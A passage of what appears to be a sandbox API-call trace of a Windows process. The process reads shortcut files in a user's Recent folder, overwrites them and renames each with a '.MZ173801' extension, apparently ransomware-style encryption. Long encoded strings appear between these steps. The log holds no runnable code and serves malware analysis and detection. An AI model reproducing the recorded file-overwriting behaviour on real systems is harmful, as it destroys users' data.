out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3b0, lpOverlapped=0x0) returned 1 [0108.274] CloseHandle (hObject=0x3f4) returned 1 [0108.275] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EtLEEKM-JP9vt.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\etleekm-jp9vt.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EtLEEKM-JP9vt.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\etleekm-jp9vt.lnk.mz173801")) returned 1 [0108.275] GetCurrentThreadId () returned 0x1358 [0108.275] GetCurrentThreadId () returned 0x1358 [0108.276] GetCurrentThreadId () returned 0x1358 [0108.276] GetCurrentThreadId () returned 0x1358 [0108.276] GetCurrentThreadId () returned 0x1358 [0108.276] GetCurrentThreadId () returned 0x1358 [0108.276] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9cc1e63b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9cc1e63b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x366, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="F yK2LwO.lnk", cAlternateFileName="FYK2LW~1.LNK")) returned 1 [0108.276] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.276] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F yK2LwO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\f yk2lwo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9cc1e63b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9cc1e63b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x366)) returned 1 [0108.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.277] GetCurrentThreadId () returned 0x1358 [0108.277] GetCurrentThreadId () returned 0x1358 [0108.277] GetCurrentThreadId () returned 0x1358 [0108.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.278] GetCurrentThreadId () returned 0x1358 [0108.278] GetCurrentThreadId () returned 0x1358 [0108.278] GetCurrentThreadId () returned 0x1358 [0108.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F yK2LwO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\f yk2lwo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x366 [0108.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.278] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x366, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x366, lpOverlapped=0x0) returned 1 [0108.279] CloseHandle (hObject=0x3f4) returned 1 [0108.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F yK2LwO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\f yk2lwo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.281] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x366, lpOverlapped=0x0) returned 1 [0108.282] CloseHandle (hObject=0x3f4) returned 1 [0108.376] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F yK2LwO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\f yk2lwo.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F yK2LwO.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\f yk2lwo.lnk.mz173801")) returned 1 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.377] GetCurrentThreadId () returned 0x1358 [0108.378] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb841258, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x91e557dc, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x91e557dc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fhb23ambk-o.lnk", cAlternateFileName="FHB23A~1.LNK")) returned 1 [0108.378] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.378] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.378] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fhb23ambk-o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fhb23ambk-o.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb841258, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x91e557dc, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x91e557dc, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37a)) returned 1 [0108.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.379] GetCurrentThreadId () returned 0x1358 [0108.379] GetCurrentThreadId () returned 0x1358 [0108.379] GetCurrentThreadId () returned 0x1358 [0108.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0M